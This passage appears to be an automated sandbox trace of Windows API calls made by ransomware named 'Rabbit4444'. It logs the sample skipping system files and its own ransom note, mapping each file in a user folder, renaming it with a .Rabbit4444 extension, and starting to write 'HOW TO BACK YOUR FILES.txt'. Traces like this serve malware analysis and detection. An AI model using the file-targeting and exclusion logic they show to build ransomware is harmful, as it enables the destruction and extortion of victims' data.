dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.564] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.564] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16187446694) returned 1 [0070.564] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=23610) returned 1 [0070.564] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0070.564] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0070.564] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5f40, lpName=0x0) returned 0x2d0 [0070.565] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5f40) returned 0x70000 [0070.567] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115288 [0070.567] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0070.567] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115288 | out: hHeap=0xe0000) returned 1 [0070.567] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0070.567] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11d948 [0070.567] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0070.567] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0070.567] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0070.567] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16187825061) returned 1 [0070.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0070.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0070.568] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.568] CloseHandle (hObject=0x2d0) returned 1 [0070.568] CloseHandle (hObject=0x29c) returned 1 [0070.568] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml.Rabbit4444") returned 166 [0070.568] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml.rabbit4444"), dwFlags=0x1) returned 1 [0070.569] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa86c3528, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xa86c3528, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x85007c03, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x424c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", cAlternateFileName="E9D217~2.XML")) returned 1 [0070.569] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.569] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.569] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpString2="Rabbit4444.exe") returned -1 [0070.569] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpString2=".") returned 1 [0070.569] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpString2="..") returned 1 [0070.569] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpString2="windows") returned -1 [0070.569] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpString2="bootmgr") returned 1 [0070.569] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpString2="pagefile.sys") returned -1 [0070.569] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpString2="boot") returned 1 [0070.569] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpString2="ids.txt") returned -1 [0070.569] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpString2="NTUSER.DAT") returned -1 [0070.569] lstrcpyW (in: lpString1=0x130ec14, lpString2="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml" | out: lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml") returned="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml" [0070.569] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", dwFileAttributes=0x0) returned 1 [0070.570] lstrlenW (lpString="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml") returned 49 [0070.570] lstrlenW (lpString="Rabbit4444") returned 10 [0070.570] lstrcmpiW (lpString1="thdraw.xml", lpString2="Rabbit4444") returned 1 [0070.570] lstrlenW (lpString=".dll") returned 4 [0070.570] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0070.570] lstrlenW (lpString=".lnk") returned 4 [0070.570] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0070.570] lstrlenW (lpString=".ini") returned 4 [0070.570] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0070.570] lstrlenW (lpString=".sys") returned 4 [0070.570] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0070.570] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.570] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.571] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16188128452) returned 1 [0070.571] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=16972) returned 1 [0070.571] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0070.571] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0070.571] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4550, lpName=0x0) returned 0x2d0 [0070.572] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4550) returned 0x70000 [0070.576] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115288 [0070.576] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0070.577] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115288 | out: hHeap=0xe0000) returned 1 [0070.577] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0070.577] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11d948 [0070.577] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0070.577] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0070.577] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0070.577] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16188768200) returned 1 [0070.577] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0070.577] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0070.577] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.577] CloseHandle (hObject=0x2d0) returned 1 [0070.577] CloseHandle (hObject=0x29c) returned 1 [0070.577] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml.Rabbit4444") returned 170 [0070.577] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml.rabbit4444"), dwFlags=0x1) returned 1 [0070.578] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7409103, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xc7409103, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xb806a476, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x43ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", cAlternateFileName="FFFD8B~1.XML")) returned 1 [0070.578] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.578] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.578] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", lpString2="Rabbit4444.exe") returned -1 [0070.578] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", lpString2=".") returned 1 [0070.578] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", lpString2="..") returned 1 [0070.578] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", lpString2="windows") returned -1 [0070.578] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", lpString2="bootmgr") returned 1 [0070.578] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", lpString2="pagefile.sys") returned -1 [0070.578] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", lpString2="boot") returned 1 [0070.578] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", lpString2="ids.txt") returned -1 [0070.578] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", lpString2="NTUSER.DAT") returned -1 [0070.578] lstrcpyW (in: lpString1=0x130ec14, lpString2="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml" | out: lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml") returned="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml" [0070.579] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", dwFileAttributes=0x0) returned 1 [0070.579] lstrlenW (lpString="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml") returned 45 [0070.579] lstrlenW (lpString="Rabbit4444") returned 10 [0070.579] lstrcmpiW (lpString1="d_show.xml", lpString2="Rabbit4444") returned -1 [0070.579] lstrlenW (lpString=".dll") returned 4 [0070.579] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0070.579] lstrlenW (lpString=".lnk") returned 4 [0070.579] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0070.579] lstrlenW (lpString=".ini") returned 4 [0070.579] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0070.579] lstrlenW (lpString=".sys") returned 4 [0070.579] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0070.579] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\fffd8b5d-0172-4719-a792-b7c76986459d_show.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\fffd8b5d-0172-4719-a792-b7c76986459d_show.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.580] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.580] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16189060719) returned 1 [0070.580] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=17325) returned 1 [0070.580] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0070.580] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0070.580] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x46b0, lpName=0x0) returned 0x2d0 [0070.581] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x46b0) returned 0x70000 [0070.582] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115288 [0070.582] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0070.582] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115288 | out: hHeap=0xe0000) returned 1 [0070.582] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0070.582] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11d948 [0070.582] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0070.582] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0070.582] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0070.582] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16189321669) returned 1 [0070.583] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0070.583] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0070.583] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.583] CloseHandle (hObject=0x2d0) returned 1 [0070.583] CloseHandle (hObject=0x29c) returned 1 [0070.583] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\fffd8b5d-0172-4719-a792-b7c76986459d_show.xml.Rabbit4444") returned 166 [0070.583] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\fffd8b5d-0172-4719-a792-b7c76986459d_show.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\fffd8b5d-0172-4719-a792-b7c76986459d_show.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\fffd8b5d-0172-4719-a792-b7c76986459d_show.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\fffd8b5d-0172-4719-a792-b7c76986459d_show.xml.rabbit4444"), dwFlags=0x1) returned 1 [0070.584] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7455551, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xc7455551, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xb819b5fa, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x4443, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", cAlternateFileName="FFFD8B~2.XML")) returned 1 [0070.584] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.584] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.584] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", lpString2="Rabbit4444.exe") returned -1 [0070.584] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", lpString2=".") returned 1 [0070.584] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", lpString2="..") returned 1 [0070.584] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", lpString2="windows") returned -1 [0070.584] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", lpString2="bootmgr") returned 1 [0070.584] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", lpString2="pagefile.sys") returned -1 [0070.584] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", lpString2="boot") returned 1 [0070.584] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", lpString2="ids.txt") returned -1 [0070.584] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", lpString2="NTUSER.DAT") returned -1 [0070.584] lstrcpyW (in: lpString1=0x130ec14, lpString2="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml" | out: lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml") returned="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml" [0070.584] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", dwFileAttributes=0x0) returned 1 [0070.585] lstrlenW (lpString="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml") returned 49 [0070.585] lstrlenW (lpString="Rabbit4444") returned 10 [0070.585] lstrcmpiW (lpString1="thdraw.xml", lpString2="Rabbit4444") returned 1 [0070.585] lstrlenW (lpString=".dll") returned 4 [0070.585] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0070.585] lstrlenW (lpString=".lnk") returned 4 [0070.585] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0070.585] lstrlenW (lpString=".ini") returned 4 [0070.585] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0070.585] lstrlenW (lpString=".sys") returned 4 [0070.585] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0070.585] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.585] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.585] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16189618754) returned 1 [0070.585] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=17475) returned 1 [0070.586] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0070.586] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101628 [0070.586] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4750, lpName=0x0) returned 0x2d0 [0070.586] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4750) returned 0x70000 [0070.588] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115288 [0070.588] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0070.588] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115288 | out: hHeap=0xe0000) returned 1 [0070.588] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0070.588] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11d948 [0070.588] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0070.588] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0070.588] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0070.588] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16189889259) returned 1 [0070.588] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0070.588] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101628 | out: hHeap=0xe0000) returned 1 [0070.588] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.588] CloseHandle (hObject=0x2d0) returned 1 [0070.589] CloseHandle (hObject=0x29c) returned 1 [0070.589] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml.Rabbit4444") returned 170 [0070.589] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml.rabbit4444"), dwFlags=0x1) returned 1 [0070.589] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7455551, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xc7455551, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xb819b5fa, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x4443, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", cAlternateFileName="FFFD8B~2.XML")) returned 0 [0070.589] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0070.589] lstrcpyW (in: lpString1=0x130ec14, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.589] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0070.590] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0070.590] MapViewOfFile 